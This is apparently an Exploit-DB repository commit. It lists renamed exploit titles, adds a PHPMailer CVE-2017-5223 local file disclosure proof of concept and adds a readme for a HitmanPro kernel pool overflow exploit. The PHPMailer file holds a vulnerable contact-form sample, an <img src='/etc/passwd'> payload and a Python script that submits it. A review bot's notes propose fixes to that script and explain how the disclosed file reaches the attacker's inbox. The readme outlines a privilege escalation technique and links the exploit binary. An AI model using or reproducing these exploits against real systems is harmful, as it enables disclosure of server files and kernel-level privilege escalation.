SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting
SurgeLDAP 1.0 d - 'User.cgi' Cross-Site Scripting

Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - Message.cgi Cross-Site Scripting
Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - 'Message.cgi' Cross-Site Scripting

CommerceSQL Shopping Cart 2.2 - index.cgi Directory Traversal
CommerceSQL Shopping Cart 2.2 - 'index.cgi' Directory Traversal

DansGuardian Webmin Module 0.x - edit.cgi Directory Traversal
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal

ShopCartCGI 2.3 - gotopage.cgi Traversal Arbitrary File Access
ShopCartCGI 2.3 - 'gotopage.cgi' Traversal Arbitrary File Access

BoardPower Forum - ICQ.cgi Cross-Site Scripting
BoardPower Forum - 'ICQ.cgi' Cross-Site Scripting

Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi Arbitrary Command Execution
Axis Network Camera 2.x And Video Server 1-3 - 'virtualinput.cgi' Arbitrary Command Execution

Gossamer Threads Links 2.x - User.cgi Cross-Site Scripting
Gossamer Threads Links 2.x - 'User.cgi' Cross-Site Scripting

MegaBook 2.0/2.1 - Admin.cgi EntryID Cross-Site Scripting
MegaBook 2.0/2.1 - 'Admin.cgi?EntryID' Cross-Site Scripting

PerlDiver 2.31 - Perldiver.cgi Cross-Site Scripting
PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site Scripting

GlobalNoteScript 4.20 - Read.cgi Remote Command Execution
GlobalNoteScript 4.20 - 'Read.cgi' Remote Command Execution

Pngren 2.0.1 - Kaiseki.cgi Remote Command Execution
Pngren 2.0.1 - 'Kaiseki.cgi' Remote Command Execution

Walla TeleSite 3.0 - ts.cgi File Existence Enumeration
Walla TeleSite 3.0 - 'ts.cgi' File Existence Enumeration

Easy Search System 1.1 - search.cgi Cross-Site Scripting
Easy Search System 1.1 - 'search.cgi' Cross-Site Scripting

Kryptronic ClickCartPro 5.1/5.2 - CP-APP.cgi Cross-Site Scripting
Kryptronic ClickCartPro 5.1/5.2 - 'CP-APP.cgi' Cross-Site Scripting

Cholod MySQL Based Message Board - Mb.cgi SQL Injection
Cholod MySQL Based Message Board - 'Mb.cgi' SQL Injection

BlankOL 1.0 - Bol.cgi Multiple Cross-Site Scripting Vulnerabilities
BlankOL 1.0 - 'Bol.cgi' Multiple Cross-Site Scripting Vulnerabilities

Web-APP.net WebAPP 0.9.x - /mods/calendar/index.cgi?vsSD' Cross-Site Scripting
Web-APP.net WebAPP 0.9.x - '/mods/calendar/index.cgi?vsSD' Cross-Site Scripting

Net Clubs Pro 4.0 - imessage.cgi 'Username' Cross-Site Scripting
Net Clubs Pro 4.0 - 'imessage.cgi?Username' Cross-Site Scripting

Cosmoshop 8.10.78/8.11.106 - Lshop.cgi SQL Injection
Cosmoshop 8.10.78/8.11.106 - 'Lshop.cgi' SQL Injection

Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities
Netwin SurgeFTP 2.3a1 - 'SurgeFTPMGR.cgi' Multiple Input Validation Vulnerabilities

WebEvent 4.03 - Webevent.cgi Cross-Site Scripting
WebEvent 4.03 - 'Webevent.cgi' Cross-Site Scripting

Urchin 5.7.x - session.cgi Cross-Site Scripting
Urchin 5.7.x - 'session.cgi' Cross-Site Scripting

Google Urchin 5.7.3 - Report.cgi Authentication Bypass
Google Urchin 5.7.3 - \Report.cgi' Authentication Bypass

Web Terra 1.1 - books.cgi Remote Command Execution
Web Terra 1.1 - 'books.cgi' Remote Command Execution

D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi
D-Link DSL-2730B Modem - 'Lancfg2get.cgi Persistent Cross-Site Scripting

Zenoss 3.2.1 - Remote Authenticated Command Execution
Zenoss 3.2.1 - Authenticated Remote Command Execution

Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)
Gemtek CPE7000 - WLTCS-106 'sysconf.cgi' Unauthenticated Remote Command Execution (Metasploit)
Offensive Security 2017-10-27 05:01:37 +00:00
parent c9ca104d1d
commit e515bac4fe
3 changed files with 328 additions and 242 deletions

files.csv (486 changes)
File diff suppressed because it is too large

platforms/php/local/43056.py (65 additions, new executable file)

@ -0,0 +1,65 @@
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
// PoC //
It requires a contact form that sends HTML emails and allows to send a copy to your e-mail
// vulnerable form example //
<?php
require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
$mail = new PHPMailer();
$mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
$address = "admin@localhost";
$mail->AddAddress($address, "root");
if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]);
$mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
$mail->MsgHTML($_POST["your-message"]);
if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!";
}
?>
<form action="/contact.php" method="post">
<p><label>Your Name<br /><input type="text" name="your-name" value="" size="40" /></span> </label></p>
<p><label>Your Email<br /><input type="email" name="your-email" value="" size="40" /></span> </label></p>
<p><label>Your Message<br /><textarea name="your-message" cols="40" rows="10"></textarea></label></p>
<p><input type="checkbox" name="cc" value="yes" /><span>Send me a copy of this message</span>
<p><input type="submit" value="submit" /></p>
// exploit //
Put <img src="/etc/passwd"> in the message (or other file to disclose).
// python code //
#!/usr/bin/python
import urllib
import urllib2
poc = """
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
"""
url = 'http://localhost/contact.php'
email = 'attacker@localhost'
payload = '<img src="/etc/passwd"'
values = {'action': 'send', 'your-name': 'Attacker', 'your-email': email, 'cc': 'yes', 'your-message': payload}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
html = response.read()
print html
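Review bot: platforms/php/local/43056.py is not runnable as saved: everything between `// PoC //` and `// python code //` (the prose, the `<?php ... ?>` sample form and the HTML `<form>`) sits outside any string or comment, so the interpreter raises a SyntaxError long before it reaches the urllib2 code. Either move the write-up and the PHP/HTML sample into a triple-quoted string (the file already carries an unused `poc = """..."""` block that only repeats the header) or ship the write-up as .txt with the Python kept separate. Smaller points in the same hunk: `payload = '<img src="/etc/passwd"'` drops the closing `>` that the instruction line `Put <img src="/etc/passwd">` shows; `values` posts an `action: send` field the sample form never reads; the sample form emits `</span>` closers for the name and email fields with no matching `<span>`; and `urllib`/`urllib2` tie the script to Python 2. It would also help the reader to state after `print html` that the disclosed file arrives as an attachment in the CC copy delivered to the attacker-controlled `your-email` address, since the script itself only prints the form response and never checks whether `Sent!` came back.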


@ -0,0 +1,19 @@
Exploit-CVE-2017-6008
The CVE-2017-6008 is a vulnerability in the HitmanPro scan that allows privilege escalation by exploiting a kernel pool buffer overflow. The exploits here use the Quota Process Pointer Overwrite attack as described in the Tarjei Mandt's paper
Also, the exploits use my Pool sprayer library
You can find a detailed paper on the Windows 7 exploit here:
https://trackwatch.com/kernel-pool-overflow-exploitation-in-real-world-windows-7/
Windows 10 version
This version use another vulnerability in the hitmanpro37.sys driver, an Out-Of-Bounds read, which we use to leak the Pool Cookie. This leak allows us to use the very same attack on Windows 10.
You can find a detailed paper of the exploit on Windows 10 here (coming soon):
https://trackwatch.com/
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43057.zip
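Review bot: this write-up names neither the affected HitmanPro build nor the version of hitmanpro37.sys it was tested against, so from the file alone a reader cannot tell what is exploitable beyond "the HitmanPro scan"; the entry's own title in this commit (HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow) should at least be carried into a header of the kind 43056.py uses (Exploit Title, Version, Tested on, CVE). The "Pool sprayer library" both exploits depend on is mentioned but not linked, Tarjei Mandt's paper is cited by author only (give its title or URL), and the Windows 10 paper link is a bare domain marked "coming soon", which leaves the binary 43057.zip as the only reproducible artifact. Grammar: "This version use another vulnerability" should read "uses", and "the Tarjei Mandt's paper" should drop "the".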